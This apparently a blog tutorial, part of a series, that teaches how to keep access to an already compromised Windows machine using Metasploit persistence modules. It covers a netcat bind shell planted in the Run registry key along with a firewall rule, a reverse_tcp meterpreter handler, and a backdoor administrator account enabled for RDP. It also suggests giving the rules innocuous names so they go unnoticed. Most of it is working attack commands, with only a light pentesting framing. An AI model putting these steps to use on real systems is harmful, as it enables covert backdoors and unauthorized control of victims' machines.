Persistence Techniques with Metasploit - Part 6
Persistence Techniques with Metasploit
Getting a shell in real world requries a lot of hardwork and research , All this work put in so that we will be ok to loose the session when the user logs off or turns the computer off ? Hell no ! , we need to make our connection persistance so that we can get back alive when the computer's on or when the user logs in. And we will be taking a look into the post module section which helps us to make our connection persistence after exploiting the target machine.
Note : For creating a persistence backdoor you should have already compromised the target machine and have the meterpreter shell
Pov : you have already exploited the target machine and had a meterpreter shell
Commands :
use exploit/windows/local/persistence_exe
show options
Fig : 1.1
In Fig : 1.1 we can see the different options availabe
REXENAME option defines the name of the exe file the module is going to put on the remote system
REXEPATH denotes the local path of the executable that gave us the session
SESSION expects the session number on which we want the persistent connection over
STARTUP option has a set of values which define the behaviour of the execution of the exe file on startup
USER : Starts the exe file upon the user login (Doesnot require the session to have privilages)
SYSTEM : Starts the exe file on system boot (requires the session to have privilages)
SERVICE : Runs the exe file as a service (requries the session to have privilages)
Commands :
set REXEPATH /home/nikhil/payload/newcalc.exe (Path of the payload in my case)
set SESSION 1 (session number in my case)
Fig : 1.2
Leaving the STARTUP to USER in my case as my session over the target doesn't have privlages as the payload is executed by a regular user
Before you hit run you make sure that you have the multi-handler running in the background to catch the session upon user login using the following commands :
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.13.235 (Whatever your machine's ip is)
set LPORT 9999
set ExitOnSession false
run -j
Now that you have the multi-handler running in the background now come back to the persistence module and run it
Commands :
use post/windows/manage/persistence_exe
run
Fig : 1.3
In Fig : 1.3 we can see some a lot of info when we run the module and a new session is created as well already !
I recommend yo to copy and store the info which will helps to clear the connect back behaviour to the attacker machine by the target machine manually upon user login which is a must in real world as a white hat hacker as the post modules sometimes don't do a good job in cleaning up :)
Now lets reboot the target windows machine and see if we can get the session upon user login !
Fig : 1.4
In Fig : 1.4 we can see that we have first lost our existing sessions as we have rebooted the target system
and then later when I have logged in we can see the new session we've got from the target machine ! Isn't that cool !
So this way we can gain the persistence connection on the target machine
Now that we have gained the persistence connection , its time to clear executable which does the connection back to the attacker machine which is usually done is real world after the assesment
To do so we can simply run the resource file on the remote machine which was setup by the persistence module itself at the time we ran it , as have told you to copy the info the module gave , now go and copy the complete the total path of the .rc extention file which is denoted by the field Cleanup Meterpreter RC File.
Command :
resource PathOfTheResourceFile
Fig : 1.5
And now you can reboot the remote target machine and you will notice no session back to you !
It is recommended to execute the resource file on the session that you have gained because of the persistence module so that the resource file executes with no problems but nothing ever goes as planned in the accursed world ! It the script file did not clean up properly or if we are able to catch the session even after running the resource file then we gotta remove the files manually present in the registery and it had a case scenario so let do it manually !
Go to you target windows machine :
Windows icon -> search regedit -> HKEY_CURRENT_USER -> Software -> Microsoft -> Windows -> Current Version -> run (you can find this location in the info section that we had copied before )
Fig : 1.6
In Fig : 1.6 you can see the entry in the autorun (never mind the entry detail in my case and if you have noticied it is misconfigured)
So just right click it and delete it !
And that's how we stop the target machine from connecting by to us :)
Registry Persistence
The previous module installed an exe file onto the system and ran it upon user login but the module we are going to see now is going to replace the location of the executable to be executed in the registry key with the script that will connect back to the attacker machine ! Woop-Woop !
Commands :
use exploit/windows/local/registry_persistence
show options
Fig : 1.7
In Fig : 1.7 we can see the only necessary options are LHOST , LPORT and SESSION so let give the module what it needs and run it
Commands :
set LHOST localmachineip
set LPORT portnumber (portnumber multi-handler is listening on)
set SESSION sessionnumber (which is 1 in mycase)
run
Note :
The payload is set to windows/meterpreter/reverse_tcp by default which is exactly the connect back type and you can change it if yours is different
Fig : 1.8
In Fig :1.8 you can see the module ran sucessfully and you know the info generated is helpfull so copy and save it somewhere
And now lets restart the target machine and see if we get a connect back upon user login as the startup option is set to USER
Fig : 1.9
And there we go in Fig :1.9 we can see the session we've got
Fig : 2.0
In Fig : we can see the script in the run registry , that for sure is scary as hell and you are on your own to clear the connect back behaviour this time.
Persistence technique using netcat
We can make our connection persistent using netcat we well ! To do so we need to upload the netcat.exe file onto the windows machine (if it doesn't exist already) and make a manual entry in the run registry key which makes the target windows machine to listen to a certain port upon user login , and then we also need to add a firewall rule so that we can prevent the target windows machine firewall from blocking our inbound connection
So Let's first upload the netcat.exe file onto the target windows machine through the meterpreter session we've got
Command :
upload PathOfExecutableOnLocalMachine PathOnRemoteMachineToStoreTheExectuable
Fig : 2.1
In Fig : 2.1 we can see that nc.exe file has been uploaded on the target machine at the location : C:\Users\Itachi\Desktop
Now as we are done with uploading part , its time for the real deal , This is when we create an entry in the run registry which makes it run upon user login and all thanks to meterpreter as this can be achieved through the reg command provided by metreperter :)
Command :
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v netcat -d 'C:\Users\Itachi\nc.exe -Ldp 8000 -e cmd.exe'
-k : used to specify the registry key path
-v : name of the registry
-d : data to be executed
Fig : 2.2
Fig : 2.3
In Fig : 2.3 we can see the entry created in the Run registry
As we are done with creating the entry in the run registry key , its time to create a firewall rule which allow inbound connection to that specific port
Command :
netsh advfirewall firewall add rule name=netcat dir=in action=allow protocol=Tcp localport=8000
Fig : 2.4
Fig : 2.5
In Fig : 2.5 we see the entry added into the inbound rules of the firewall and ofcourse in real-world pentesting we are not going to name our rules as netcat which makes it obvious , we could name it something less suspicious like microsoft services
Thats all it is to it , restart the target machine and now try to connect to the listening port (you will see a cmd.exe just flash on the screen when you reboot the target machine which is fishy but we know why)
Command :
nc -nv TargetMachineIp 8000
Fig : 2.6
And there you go in Fig : 2.6 you can see that got the cmd.exe back sucessfully !
Persistence With RDP :
Yes ! you heard it right , we can get a maintain a persistent graphical user interface as well !
To do so we are going to use the module windows/manage/enable_rdp
Commands :
use windows/manage/enable_rdp
show options
Fig : 2.7
In Fig : 2.7 we can see requried options are SESSION , USERNAME and PASSWORD
set SESSION 2 (in my case)
set USERNAME hehe (could be anything of your wish)
set PASSWORD P@ssw0rd! (could be anything of your wish)
run
Fig : 2.8
And there you go we have created a user on the target machine named hehe with password set to P@ssw0rd! . Not only that , the module also enables the RDP on the target machine if it is disabled and adds the created user hehe into local groups Remote Desktop Users and Administrators which means we can get the gui with admin rights !
Fig : 2.9
In Fig : 2.9 just type yes and hit enter
In Fig : 3.0 you can see the gui to interact with , click on Other User and enter the details to login
Fig : 3.1
and should be pertty cautious . It is recommended to use it on off time hours where no employee in sitting infront of the machine .
Fig : 3.2
Note :
If you know the username and password of any account on the target machine then there is need to create a new user on the account you could just enable the rdp on the target machine and you are good to go !
And there you go we have covered a bunch of techiniques on how we can gain a persistent connection over the target machine , I hope you have learned something new today :)
--------------------------------------------------------------NOT THE END-----------------------------------------------------
Comments
Post a Comment